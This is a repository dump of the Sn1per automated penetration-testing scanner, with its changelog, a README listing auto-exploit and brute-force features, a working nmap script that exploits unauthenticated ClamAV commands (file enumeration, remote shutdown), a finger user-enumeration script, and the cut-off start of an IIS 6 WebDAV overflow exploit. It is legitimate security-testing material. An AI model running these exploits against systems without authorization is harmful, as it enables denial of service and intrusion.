├── .gitattributes
├── .gitignore
├── CHANGELOG.md
├── README.md
├── Sn1per-logo.jpg
├── Sn1per-v1.5-report
├── TODO.md
├── bin
    ├── clamav-exec.nse
    ├── dnsdict6
    ├── fingertool.sh
    ├── iis-buffer-overflow.nse
    ├── inurlbr.php
    ├── samrdump.py
    └── snmpbrute.py
├── build.sh
├── install.sh
├── loot
    └── README.md
└── sniper


/.gitattributes:
--------------------------------------------------------------------------------
 1 | # Auto detect text files and perform LF normalization
 2 | * text=auto
 3 | 
 4 | # Custom for Visual Studio
 5 | *.cs     diff=csharp
 6 | 
 7 | # Standard to msysgit
 8 | *.doc	 diff=astextplain
 9 | *.DOC	 diff=astextplain
10 | *.docx diff=astextplain
11 | *.DOCX diff=astextplain
12 | *.dot  diff=astextplain
13 | *.DOT  diff=astextplain
14 | *.pdf  diff=astextplain
15 | *.PDF	 diff=astextplain
16 | *.rtf	 diff=astextplain
17 | *.RTF	 diff=astextplain
18 | 


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
 1 | # Windows image file caches
 2 | Thumbs.db
 3 | ehthumbs.db
 4 | 
 5 | # Folder config file
 6 | Desktop.ini
 7 | 
 8 | # Recycle Bin used on file shares
 9 | $RECYCLE.BIN/
10 | 
11 | # Windows Installer files
12 | *.cab
13 | *.msi
14 | *.msm
15 | *.msp
16 | 
17 | # Windows shortcuts
18 | *.lnk
19 | 
20 | # =========================
21 | # Operating System Files
22 | # =========================
23 | 
24 | # OSX
25 | # =========================
26 | 
27 | .DS_Store
28 | .AppleDouble
29 | .LSOverride
30 | 
31 | # Thumbnails
32 | ._*
33 | 
34 | # Files that might appear in the root of a volume
35 | .DocumentRevisions-V100
36 | .fseventsd
37 | .Spotlight-V100
38 | .TemporaryItems
39 | .Trashes
40 | .VolumeIcon.icns
41 | 
42 | # Directories potentially created on remote AFP share
43 | .AppleDB
44 | .AppleDesktop
45 | Network Trash Folder
46 | Temporary Items
47 | .apdisk
48 | 


--------------------------------------------------------------------------------
/CHANGELOG.md:
--------------------------------------------------------------------------------
  1 | ## CHANGELOG:
  2 | * v2.7 - Fixed issue with sniper update command and install.sh not running
  3 | * v2.7 - Fixed errors with GooHak
  4 | * v2.7 - Fixed syntax errors in sniper conditional statements 
  5 | * v2.7 - Added CloudFail 
  6 | * v2.7 - Fixed issue with [: ==: unary operator expected errors
  7 | * v2.6 - Added Blackarch Linux support 
  8 | * v2.6 - Added $BROWSER variable to set default browser
  9 | * v2.5g - Updated README with update command
 10 | * v2.5f - Fixes for various bugs reported and fixed by @ifly53e (https://github.com/1N3/Sn1per/pull/89)
 11 | * v2.5e - Fixed issue with port 3128/tcp checks (CC. @ifly53e)
 12 | * v2.5d - Added searchsploit option for (-v) to search all terms (CC. @ifly53e)
 13 | * v2.5c - Added various improvements to 'discover' mode scans
 14 | * v2.5b - Removed NMap script checks for 'fullportonly' mode
 15 | * v2.5a - Added auto-updates to check and download new versions
 16 | * v2.5a - Fixed issue with install.sh to resolve pip aha error
 17 | * v2.5a - Added libxml2-utils to install.sh to meet dependencies
 18 | * v2.5 - Added HTML report generation via sniper 'loot' command
 19 | * v2.5 - Added automatic NMap searchsploit integration to find exploits
 20 | * v2.5 - Added various improvements to Sn1per discovery scan mode
 21 | * v2.5 - Fixed issue with IIS BoF NMap script (CC. ifly53e)
 22 | * v2.4f - Fixed issue with upper NMap port range(CC. DaveW)
 23 | * v2.4e - Added NMap no ping switch to all scans
 24 | * v2.4d - Fixed issue with rpcinfo install script
 25 | * v2.4d - Fixed issue with Arachni install script
 26 | * v2.4c - Added loot and $TARGET sanity checks (CC. @menzow)
 27 | * v2.4b - Fixed issue with discovery scan output file (CC. @ifly53e)
 28 | * v2.4b - Fixed issue with Intel AMT RCE port list
 29 | * v2.4a - Added all NMap script checks via 'fullportonly' mode
 30 | * v2.4a - Added JBoss JMX Console Beanshell Deployer WAR Upload and Deployment Metasploit exploit
 31 | * v2.4a - Added Java RMI RCE NMap/Metasploit detection
 32 | * v2.4a - Added INTEL-SA-00075 (Intel AMT) vulnerability NMap script
 33 | * v2.4 - Added detection for open X11 servers
 34 | * v2.4 - Added IIS6 Win2k3 RCE NMap script
 35 | * v2.4 - Added option to disable Google Hacking queries via Firefox
 36 | * v2.3d - Fixed issue with loot command
 37 | * v2.3c - Added Apache Struts 2 RCE NMap script
 38 | * v2.3c - Added Apache Struts 2 RCE NMap exploit
 39 | * v2.3b - Changed NMap scan options to exclude ping sweeps (-P0)
 40 | * v2.3a - Fixed minor issue with MSSQL NMap script command (CC. @helo86)
 41 | * v2.3 - Fixed minor issues with missing $TARGET definitions for NMap (CC. @helo86)
 42 | * v2.2f - Added various optimizations and minor code fixes
 43 | * v2.2e - Changed NMap scan options (removed -P0 flag)
 44 | * v2.2d - Added MongoDB checks
 45 | * v2.2d - Improved NMap scanning options
 46 | * v2.2c - Added CouchDB checks
 47 | * v2.2c - Updated Sub-domain takeover list
 48 | * v2.2b - Added fullportonly mode to do exclusive full port scans
 49 | * v2.2b - Fixed minor issue with Metasploit Pro not starting
 50 | * v2.2b - Fixed minor issue with sniper loot command
 51 | * v2.2a - Fixed minor issue with loot function
 52 | * v2.2 - Added auto Metasploit Pro & Zenmap GUI integration
 53 | * v2.2 - Added Sn1per workspaces to loot directory
 54 | * v2.1d - Added crt.sh sub-domain check
 55 | * v2.1d - Removed blank screenshots from loot directory
 56 | * v2.1c - Fixed issue with install.sh install directories
 57 | * v2.1b - Added automatic Metasploit NMap xml imports for loot directory
 58 | * v2.1b - Removed Zenmap
 59 | * v2.1a - Separated Arachni reports for port 80/443/tcp
 60 | * v2.1a - Fixed NMap full port scan options
 61 | * v2.1 - Added Arachni with auto HTML web reporting (web mode only)
 62 | * v2.1 - Added full NMap detailed port scans
 63 | * v2.1 - Added port 4443/tcp checks
 64 | * v2.1 - Added META tag scans for web apps
 65 | * v2.1 - Removed Uniscan from web mode
 66 | * v2.1 - Removed SQLMap from web mode
 67 | * v2.0b - Added help option --help
 68 | * v2.0a - Fixed issue with ssh-audit
 69 | * v2.0a - Fixed issue with 'discover' mode
 70 | * v2.0 - Updated sub-domain takeover list
 71 | * v2.0 - Improved scan performance for stealth, airstrike and discover modes
 72 | * v2.0 - Removed jexboss due to clear screen issue with output
 73 | * v2.0 - Auto loot directory sorting for all tools
 74 | * v2.0 - Updated install.sh package list
 75 | * v1.9c - Enabled BruteX automated brute force attacks
 76 | * v1.9b - Fixed MSSQL port 1433/tcp port scan check (@hacktrack)
 77 | * v1.9a - Removed testssl script from stealth mode scans
 78 | * v1.9 - Added Ubuntu docker image for Sn1per (@menzow)
 79 | * v1.9 - Added automatic loot directory sorting for all modes
 80 | * v1.9 - Added MSSQL port 1433/tcp checks
 81 | * v1.9 - Added SNMP port 162/tcp checks (@hexageek)
 82 | * v1.9 - Added nslookup to install.sh
 83 | * v1.9 - Fixed install.sh dependency duplicates
 84 | * v1.8c - Added -A option to all NMap port scans
 85 | * v1.8c - Fixed install.sh permission issue
 86 | * v1.8c - Fixed install.sh cleanup options
 87 | * v1.8c - Added ssh-audit
 88 | * v1.8c - Added install directory (/usr/share/sniper/) to install script for universal access
 89 | * v1.8c - Fixed issue with Metasploit SSH scans
 90 | * v1.8c - Added auto-update to install.sh to automatically pull latest github release
 91 | * v1.8b - Fixed bug with NMap UDP scan options
 92 | * v1.8b - Fixed install.sh dependencies 
 93 | * v1.8b - Fixed jexboss options
 94 | * v1.8a - Updated sub-domain hijack list of domains (CC: th3gundy)
 95 | * v1.8 - Added sub-domain hijack scans for all sub-domains
 96 | * v1.8 - Added auto explort of all sub-domains to /domains directory
 97 | * v1.8 - Added additional stealth and airstrike checks for port 80 and 443
 98 | * v1.8 - Fixed issue with theHarvester not working with google
 99 | * v1.7g - Added email security/spoofing checks
100 | * v1.7f - Added Zenmap XML auto-imports 
101 | * v1.7f - Added ClamAV RCE Nmap script
102 | * v1.7e - Fixed minor issue with airstrike and nuke mode
103 | * v1.7e - Fixed minor issues with discover mode
104 | * v1.7e - Added minor cosmetic improvements to reports
105 | * v1.7e - Disabled automatic brute forcing by default
106 | * v1.7e - Added automatic brute force setting in script vars
107 | * v1.7d - Added sslyze
108 | * v1.7d - Added 'discover' mode for full subnet scans
109 | * v1.7d - Added verbosity to scan tasks to separate sub-tasks better
110 | * v1.7c - Added plain text reporting 
111 | * v1.7c - Improved loot directory structure and sorting
112 | * v1.7b - Fixed issue with airstrike mode not scanning correctly
113 | * v1.7b - Improved passive recon performance
114 | * v1.7a - Improved NMap http scan performance
115 | * v1.7a - Removed joomscan due to verbosity issues
116 | * v1.7 - Added uniscan web vulnerability scanner
117 | * v1.7 - Added joomscan Joomla scanner
118 | * v1.7 - Improved web scan performance
119 | * v1.7 - Fixed issue with inurlbr output
120 | * v1.7 - Added remote desktop viewing for RDP connections
121 | * v1.7 - Added experimental Metasploit exploit for Apache Struts RCE (CVE-2016-3081)
122 | * v1.6e - Added reporting option for nobrute mode (CC. @mero01)
123 | * v1.6e - Improved SMB scan performance/optimization added
124 | * v1.6d - Improved NMap scan performance options
125 | * v1.6d - Added xprobe2 OS finger printing tool
126 | * v1.6d - Added jexbos JBoss autopwn
127 | * v1.6d - Merged fix for theharvester package (CC. @RubenRocha)
128 | * v1.6d - Merged fix for SuperMicroScanner (CC. @mero01)
129 | * v1.6c - Add report mode for web scans
130 | * v1.6c - Fixed issues with Sublist3r and theharvester
131 | * v1.6c - Added Shocker Shellshock exploitation scanner
132 | * v1.6b - Added Sublist3r sub-domain brute tool
133 | * v1.6b - Added cutycapt web screenshot util
134 | * v1.6a - Added improvements to recon phase
135 | * v1.6a - Fixed small issue with 3rd party extension
136 | * v1.6a - Various improvements to overall optimization of scans
137 | * v1.6a - Added new "web" mode for full web application scans 
138 | * v1.6 - Added 4 new modes including: stealth, port, airstrike and nuke
139 | * v1.6 - Added Java de-serialization scanner
140 | * v1.6 - Added reporting option to output to console and text file for all scans
141 | * v1.6 - Added option to set Sn1per full path for universal command line access
142 | * v1.6 - Added in DirBuster for web file brute forcing
143 | * v1.6 - Fixed issue with sderr errors in TheHarvester
144 | * v1.5e - Removed shodan command line tool due to issues
145 | * v1.5e - Fixed wafwoof installation in kali 2.0
146 | * v1.5d - Fixed minor issues with port 513/tmp and 514/tcp checks
147 | * v1.5c - Fixed issue which broke link to sniper directory
148 | * v1.5b - Added Squid Proxy checks port 3128/tcp
149 | * v1.5b - Fixed shodan setup options in install.sh
150 | * v1.5b - Fixed syntax error with theHarvester in install.sh
151 | * v1.5a - Fixed syntax error with port 8081 checks
152 | * v1.5a - Added Arachni integration
153 | * v1.5a - Added vsftpd, proftpd, mysql, unrealircd auto exploits
154 | * v1.5 - Added Metasploit scan and auto-exploit modules
155 | * v1.5 - Added additional port checks
156 | * v1.5 - Added full TCP/UDP NMap XML output
157 | * v1.5 - Auto tune scan for either IP or hostname/domain
158 | * v1.4h - Added auto IP/domain name scan configurations
159 | * v1.4g - Added finger enumeration scripts
160 | * v1.4g - Fixed nmap -p 445 target issue
161 | * v1.4g - Fixed smtp-enum target issue
162 | * v1.4f - Fixed BruteX directory bug
163 | * v1.4e - Fixed reported errors install.sh
164 | * v1.4e - Added auto-upgrade option to install.sh for existing Sn1per installs
165 | * v1.4d - Fixed missing rake gem install dependency
166 | * v1.4c - Reordered 3rd party extensions
167 | * v1.4b - Fixed install.sh executable references
168 | * v1.4b - Fixed Yasou dependencies in install.sh
169 | * v1.4b - Fixed minor issues with BruteX loot directory
170 | * v1.4 - Added Yasou for automatic web form brute forcing
171 | * v1.4 - Added MassBleed for SSL vulnerability detection
172 | * v1.4 - Added Breach-Miner for detection of breached accounts
173 | * v1.4 - Fixed minor errors with nmap
174 | * v1.4 - Removed debug output from goohak from displaying on console
175 | 
176 | ## FUTURE:
177 | * Add auto logging and reporting to all scans
178 | * Add HTML reporting for scans
179 | * Add automated Wireless attacks to Sn1per
180 | * Add automated MITM attacks to Sn1per
181 | * Add web mode port option for customized web scans
182 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | ![alt tag](https://github.com/1N3/Sn1per/blob/master/Sn1per-logo.jpg)
 2 | 
 3 | ## ABOUT:
 4 | Sn1per is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities. 
 5 | 
 6 | ## DEMO VIDEO:
 7 | [![Sn1per Demo](https://img.youtube.com/vi/nA_V_u3QZA4/0.jpg)](https://www.youtube.com/watch?v=nA_V_u3QZA4)
 8 | 
 9 | ## FEATURES:
10 | * Automatically collects basic recon (ie. whois, ping, DNS, etc.)
11 | * Automatically launches Google hacking queries against a target domain
12 | * Automatically enumerates open ports via NMap port scanning
13 | * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers
14 | * Automatically checks for sub-domain hijacking
15 | * Automatically runs targeted NMap scripts against open ports
16 | * Automatically runs targeted Metasploit scan and exploit modules
17 | * Automatically scans all web applications for common vulnerabilities
18 | * Automatically brute forces ALL open services
19 | * Automatically test for anonymous FTP access
20 | * Automatically runs WPScan, Arachni and Nikto for all web services
21 | * Automatically enumerates NFS shares
22 | * Automatically test for anonymous LDAP access
23 | * Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities
24 | * Automatically enumerate SNMP community strings, services and users
25 | * Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067
26 | * Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers
27 | * Automatically tests for open X11 servers
28 | * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds
29 | * Performs high level enumeration of multiple hosts and subnets
30 | * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting
31 | * Automatically gathers screenshots of all web sites
32 | * Create individual workspaces to store all scan output
33 | 
34 | ## KALI LINUX INSTALL:
35 | ```
36 | ./install.sh
37 | ```
38 | 
39 | ## DOCKER INSTALL:
40 | 
41 | Docker Install:
42 | https://github.com/The404Hacking/sn1per-docker
43 | 
44 | Docker Build:
45 | https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/
46 | 
47 | Example usage:
48 | ```
49 | $ docker pull The404Hacking/sn1per-docker
50 | $ docker run --rm -ti The404Hacking/sn1per-docker sniper menzo.io
51 | ```
52 | 
53 | ## USAGE:
54 | ```
55 | sniper <target> <report>
56 | sniper <target> stealth <report>
57 | sniper <CIDR> discover
58 | sniper <target> port <portnum> 
59 | sniper <target> fullportonly <portnum>
60 | sniper <target> web <report>
61 | sniper <target> nobrute <report>
62 | sniper <targets.txt> airstrike <report>
63 | sniper <targets.txt> nuke <report>
64 | sniper loot
65 | sniper update
66 | ```
67 | 
68 | ### MODES:
69 | * **REPORT:** Outputs all results to text in the loot directory for later reference. To enable reporting, append 'report' to any sniper mode or command.
70 | * **STEALTH:** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking
71 | * **DISCOVER:** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.
72 | * **PORT:** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.
73 | * **FULLPORTONLY:** Performs a full detailed port scan and saves results to XML.
74 | * **WEB:** Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.   
75 | * **NOBRUTE:** Launches a full scan against a target host/domain without brute forcing services.
76 | * **AIRSTRIKE:** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IP's that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.
77 | * **NUKE:** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke. 
78 | * **LOOT:** Automatically organizes and displays loot folder in your browser and opens Metasploit Pro and Zenmap GUI with all port scan results. To run, type 'sniper loot'.
79 | * **UPDATE:** Checks for updates and upgrades all components used by sniper.
80 | 
81 | ## SAMPLE REPORT:
82 | https://github.com/The404Hacking/Sn1per/blob/master/Sn1per-v1.5-report
83 | 
84 | ## Download and Clone
85 | > Download: [https://github.com/The404Hacking/Sn1per/archive/master.zip](https://github.com/The404Hacking/Sn1per/archive/master.zip)
86 | 
87 | > Clone: git clone [https://github.com/The404Hacking/Sn1per.git](https://github.com/The404Hacking/Sn1per.git)
88 | 
89 | ## The404Hacking | Digital UnderGround Team
90 | [The404Hacking](https://T.me/The404Hacking)
91 | 
92 | ## Follow us !
93 | [The404Hacking](https://T.me/The404Hacking) - [The404Cracking](https://T.me/The404Cracking)
94 | 
95 | [Instagram](https://instagram.com/The404Hacking) - [GitHub](https://github.com/The404Hacking)
96 | 
97 | [YouTube](http://yon.ir/youtube404) - [Aparat](http://www.aparat.com/The404Hacking)
98 | 


--------------------------------------------------------------------------------
/Sn1per-logo.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/The404Hacking/Sn1per/31001adb9ea364f8105efc6de03ef6d57426b80d/Sn1per-logo.jpg


--------------------------------------------------------------------------------
/TODO.md:
--------------------------------------------------------------------------------
1 | ###TODO:
2 | 
3 | * Add web port scans for directed web scans
4 | * Add proxy support for all scans
5 | * Add various modes (airstrike,nuke,web,etc.) for discovery scans
6 | * Add automatic reporting for all scans by default
7 | * Add reporting for discover mode
8 | 


--------------------------------------------------------------------------------
/bin/clamav-exec.nse:
--------------------------------------------------------------------------------
  1 | local shortport = require "shortport"
  2 | local vulns = require "vulns" 
  3 | local nmap = require "nmap"
  4 | local stdnse = require "stdnse"
  5 | local table = require "table"
  6 | local io = require "io"
  7 | local string = require "string"
  8 | 
  9 | description = [[
 10 | Exploits ClamAV servers vulnerable to unauthenticated clamav comand execution. 
 11 | 
 12 | ClamAV server 0.99.2, and possibly other previous versions, allow the execution 
 13 | of dangerous service commands without authentication. Specifically, the command 'SCAN' 
 14 | may be used to list system files and the command 'SHUTDOWN' shut downs the 
 15 | service. This vulnerability was discovered by Alejandro Hernandez (nitr0us).
 16 | 
 17 | This script without arguments test the availability of the command 'SCAN'. 
 18 | 
 19 | Reference:
 20 | * https://twitter.com/nitr0usmx/status/740673507684679680
 21 | * https://bugzilla.clamav.net/show_bug.cgi?id=11585
 22 | ]]
 23 | 
 24 | ---
 25 | -- @usage 
 26 | -- nmap -sV --script clamav-exec <target>
 27 | -- nmap --script clamav-exec --script-args cmd='scan',scandb='files.txt' <target>
 28 | -- nmap --script clamav-exec --script-args cmd='shutdown' <target>
 29 | -- 
 30 | -- @output
 31 | -- PORT     STATE SERVICE VERSION
 32 | -- 3310/tcp open  clam    ClamAV 0.99.2 (21714)
 33 | -- | clamav-exec: 
 34 | -- |   VULNERABLE:
 35 | -- |   ClamAV Remote Command Execution
 36 | -- |     State: VULNERABLE
 37 | -- |       ClamAV 0.99.2, and possibly other previous versions, allow the execution of the 
 38 | -- |       clamav commands SCAN and SHUTDOWN without authentication. The command 'SCAN' 
 39 | -- |       may be used to enumerate system files and the command 'SHUTDOWN' shut downs the 
 40 | -- |       service. This vulnerability was discovered by Alejandro Hernandez (nitr0us).
 41 | -- |       
 42 | -- |     Disclosure date: 2016-06-8
 43 | -- |     Extra information:
 44 | -- |       SCAN command is enabled.
 45 | -- |     References:
 46 | -- |       https://bugzilla.clamav.net/show_bug.cgi?id=11585
 47 | -- |_      https://twitter.com/nitr0usmx/status/740673507684679680
 48 | -- @xmloutput 
 49 | -- <table key="NMAP-1">
 50 | -- <elem key="title">ClamAV Remote Command Execution</elem>
 51 | -- <elem key="state">VULNERABLE</elem>
 52 | -- <table key="description">
 53 | -- <elem>ClamAV 0.99.2, and possibly other previous versions, allow the execution 
 54 | -- of the &#xa;clamav commands SCAN and SHUTDOWN without authentication. 
 55 | -- The command &apos;SCAN&apos; &#xa;may be used to enumerate system files and 
 56 | -- the command &apos;SHUTDOWN&apos; shut downs the &#xa;service. 
 57 | -- This vulnerability was discovered by Alejandro Hernandez (nitr0us).&#xa;</elem>
 58 | -- </table>
 59 | -- <table key="dates">
 60 | -- <table key="disclosure">
 61 | -- <elem key="year">2016</elem>
 62 | -- <elem key="day">8</elem>
 63 | -- <elem key="month">06</elem>
 64 | -- </table>
 65 | -- </table>
 66 | -- <elem key="disclosure">2016-06-8</elem>
 67 | -- <table key="extra_info">
 68 | -- <elem>SCAN command is enabled.</elem>
 69 | -- </table>
 70 | -- <table key="refs">
 71 | -- <elem>https://bugzilla.clamav.net/show_bug.cgi?id=11585</elem>
 72 | -- <elem>https://twitter.com/nitr0usmx/status/740673507684679680</elem>
 73 | -- </table>
 74 | -- </table>
 75 | --
 76 | -- @args clamav-exec.cmd Command to execute. Option: scan and shutdown
 77 | -- @args clamav-exec.scandb Database to file list. 
 78 | ---
 79 | 
 80 | author = "Paulino Calderon <calderon()websec.mx>"
 81 | license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
 82 | categories = {"exploit", "vuln"}
 83 | 
 84 | portrule = shortport.port_or_service{3310, "clam"}
 85 | 
 86 | local function shutdown(host, port)
 87 |   local s = nmap.new_socket()
 88 |   local status, err = s:connect(host, port)
 89 |   if not status then
 90 |     stdnse.debug1("Failed to connect")
 91 |     return nil
 92 |   end
 93 |   status, err = s:send("SHUTDOWN")
 94 |   if not status then
 95 |     stdnse.debug1("Failed to send SHUTDOWN command")
 96 |     return nil
 97 |   end
 98 |   return true
 99 | end
100 | 
101 | ---
102 | -- scan(host, port, file)
103 | -- Sends SCAN %FILE command to clamav.
104 | -- If no file is specified, we query a non existing file to check the response.
105 | --
106 | local function scan(host, port, file)
107 |   local data
108 |   local s = nmap.new_socket()
109 |   local status, err = s:connect(host, port)
110 |   if not status then
111 |     stdnse.debug1("Failed to connect")
112 |     return nil
113 |   end
114 | 
115 |   if not file then
116 |     status, err = s:send("SCAN /trinity/loves/nmap")
117 |     if not status then
118 |       stdnse.debug1("Failed to send SCAN command")
119 |       return nil
120 |     end
121 | 
122 |     status, data = s:receive()
123 |     if status and data:match("No such file") then
124 |       stdnse.debug1("SCAN command enabled")
125 |       return true, nil
126 |     end
127 |   else 
128 |     status, err = s:send(string.format("SCAN %s", file))
129 |     if not status then
130 |       stdnse.debug1("Failed to send 'SCAN %s' command", file)
131 |       return nil
132 |     end
133 |     status, data = s:receive()
134 |     if status then
135 |       if data:match("OK") then
136 |         stdnse.debug1("File '%s' exists", file)
137 |         return true, true
138 |       else
139 |         stdnse.debug1("File '%s' does not exists", file)
140 |         return true, nil
141 |       end
142 |     end
143 |   end
144 | 
145 |   return nil
146 | end
147 | 
148 | local function check_clam(host, port)
149 |   local s = nmap.new_socket()
150 |   local status, err = s:connect(host, port)
151 |   if not status then
152 |     stdnse.debug1("Failed to connect")
153 |     return nil
154 |   end
155 |   status, err = s:send("PING")
156 |   if not status then
157 |     stdnse.debug1("Failed to send PING command")
158 |     return nil
159 |   end
160 |   local data
161 |   status, data = s:receive()
162 |   if status and data:match("PONG") then
163 |     stdnse.debug1("PONG response received")
164 |     return true
165 |   end
166 |   return nil
167 | end
168 | 
169 | action = function(host, port)
170 |   local cmd = stdnse.get_script_args(SCRIPT_NAME..".cmd") or nil
171 |   local scandb = stdnse.get_script_args(SCRIPT_NAME..".scandb") or nil
172 | 
173 |   if cmd == "scan" and not scandb then
174 |     return "The argument 'scandb' must be set if we are using the command 'SCAN'"
175 |   end
176 | 
177 |   --Check the service and update the port table
178 |   local clamchk = check_clam(host, port)
179 |   if clamchk then
180 |     stdnse.debug1("ClamAV daemon found")
181 |     port.version.name = "clam"
182 |     port.version.product = "ClamAV"
183 |     nmap.set_port_version(host, port)
184 |   end
185 | 
186 |   local vuln = {
187 |     title = 'ClamAV Remote Command Execution',
188 |     state = vulns.STATE.NOT_VULN,
189 |     description = [[
190 | ClamAV 0.99.2, and possibly other previous versions, allow the execution of the 
191 | clamav commands SCAN and SHUTDOWN without authentication. The command 'SCAN' 
192 | may be used to enumerate system files and the command 'SHUTDOWN' shut downs the 
193 | service. This vulnerability was discovered by Alejandro Hernandez (nitr0us).
194 | ]],
195 |     references = {
196 |       'https://bugzilla.clamav.net/show_bug.cgi?id=11585',
197 |       'https://twitter.com/nitr0usmx/status/740673507684679680'
198 |     },
199 |     dates = {
200 |       disclosure = {year = '2016', month = '06', day = '8'},
201 |     },
202 |   }
203 |   local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
204 |   local status, files = nil
205 | 
206 |   if cmd == "scan" then
207 |     local file = io.open(scandb, "r")
208 |     if not file then
209 |       stdnse.debug1("Couldn't open file '%s'", scandb)
210 |       return nil
211 |     end
212 |     local files = {}
213 |     local exists
214 |     while true do
215 |       local db_line = file:read()
216 |       if not db_line then
217 |         break
218 |       end
219 |       status, exists = scan(host, port, db_line)
220 |       if status and exists then
221 |         table.insert(files, string.format("%s - FOUND!", db_line))
222 |       end
223 |     end
224 |     if #files > 0 then
225 |       vuln.extra_info = stdnse.format_output(true, files)
226 |       vuln.state = vulns.STATE.VULN
227 |     end
228 |   elseif cmd == "shutdown" then
229 |     status = shutdown(host, port)
230 |     if status then
231 |       vuln.extra_info = "SHUTDOWN command sent succesfully."  
232 |       vuln.state = vulns.STATE.VULN
233 |     end
234 |   else 
235 |     status, files = scan(host, port, nil)
236 |     if status then
237 |       vuln.extra_info = "SCAN command is enabled."
238 |       vuln.state = vulns.STATE.VULN
239 |     end
240 |   end
241 | 
242 |   return vuln_report:make_output(vuln)
243 | end
244 | 


--------------------------------------------------------------------------------
/bin/dnsdict6:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/The404Hacking/Sn1per/31001adb9ea364f8105efc6de03ef6d57426b80d/bin/dnsdict6


--------------------------------------------------------------------------------
/bin/fingertool.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | # fingertool - This script will enumerate users using finger
 3 | # SECFORCE - Antonio Quina
 4 | 
 5 | if [ $# -eq 0 ]
 6 | 	then
 7 | 		echo "Usage: $0 <IP> [<WORDLIST>]"
 8 | 		echo "eg: $0 10.10.10.10 users.txt"
 9 | 		exit
10 | 	else
11 | 		IP="$1"
12 | fi
13 | 
14 | if [ "$2" == "" ]
15 | 	then
16 | 		WORDLIST="/usr/share/metasploit-framework/data/wordlists/unix_users.txt"
17 | 	else
18 | 		WORDLIST="$2"
19 | fi
20 | 
21 | 
22 | for username in $(cat $WORDLIST | sort -u| uniq)
23 | 	do output=$(finger -l $username@$IP)
24 | 	if [[ $output == *"Directory"* ]]
25 | 		then
26 | 			echo "Found user: $username"
27 | 	fi
28 | 	done
29 | 
30 | echo "Finished!"


--------------------------------------------------------------------------------
/bin/iis-buffer-overflow.nse:
--------------------------------------------------------------------------------
  1 | local nmap = require "nmap"
  2 | local string = require "string"
  3 | local shortport = require "shortport"
  4 | local vulns = require "vulns"
  5 | 
  6 | -- NSE Buffer Overflow vulnerability in IIS
  7 | 
  8 | ---
  9 | -- @usage
 10 | -- ./nmap iis-buffer-overflow <target>
 11 | --
 12 | -- @output
 13 | -- PORT   STATE  SERVICE
 14 | -- 80/tcp open   http
 15 | -- |  iis-buffer-overflow:
 16 | -- |    VULNERABLE: Buffer Overflow in IIS 6 and Windows Server 2003 R2
 17 | -- |       State: LIKELY_VULNERABLE
 18 | -- |       Risk factor: High CVSS: 10.0
 19 | -- |       Description:
 20 | -- |         Buffer overflow in the ScStoragePathFromUrl function in the WebDAV
 21 | -- |         service in Internet Information Services (IIS) 6.0
 22 | -- |         in Microsoft Windows Server 2003 R2 allows remote attackers to execute
 23 | -- |         arbitrary code via a long header beginning with "If: <http://" in a
 24 | -- |         PROPFIND request, as exploited in the wild in July or August 2016.
 25 | -- |
 26 | -- |         Original exploit by Zhiniang Peng and Chen Wu.
 27 | -- |
 28 | -- |    References:
 29 | -- |     https://github.com/edwardz246003/IIS_exploit,
 30 | -- |_    https://0patch.blogspot.in/2017/03/0patching-immortal-cve-2017-7269.html
 31 | --
 32 | 
 33 | author = {
 34 |   "Zhiniang Peng", -- Original author
 35 |   "Chen Wu",       -- Original author
 36 |   "Rewanth Cool"   -- NSE script author
 37 | }
 38 | license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
 39 | categories = {"exploit", "vuln", "intrusive"}
 40 | 
 41 | portrule = shortport.portnumber(80, "tcp")
 42 | 
 43 | action = function(host, port)
 44 |   local socket, response, try, catch, payload, shellcode, vulnerable_name
 45 | 
 46 |   local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
 47 |   local vuln = {
 48 |     title = 'Buffer Overflow in IIS 6 and Windows Server 2003 R2',
 49 |     state = vulns.STATE.NOT_VULN,
 50 |     risk_factor = "High",
 51 |     description = [[
 52 | Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0
 53 | in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning
 54 | with "If: <http://" in a PROPFIND request, as exploited in the wild in July or August 2016.
 55 | 
 56 | Original exploit by Zhiniang Peng and Chen Wu.
 57 |     ]],
 58 |     IDS = {
 59 |       CVE = 'CVE-2017-7269'
 60 |     },
 61 |     scores = {
 62 |       CVSS = '10.0'
 63 |     },
 64 |     references = {
 65 |       'https://github.com/edwardz246003/IIS_exploit',
 66 |       'https://0patch.blogspot.in/2017/03/0patching-immortal-cve-2017-7269.html'
 67 |     },
 68 |     dates = {
 69 |       disclosure = {year = '2017', month = '03', day = '26'},
 70 |     }
 71 |   }
 72 | 
 73 |   -- If domain name doesn't exist this line of code takes ip into consideration
 74 |   vulnerable_name = host.targetname or host.ip
 75 | 
 76 |   socket = nmap.new_socket()
 77 |   catch = function()
 78 |     socket:close()
 79 |   end
 80 | 
 81 |   try = nmap.new_try(catch)
 82 |   try(socket:connect(host, port))
 83 | 
 84 |   -- Crafting the payload by parts
 85 | 
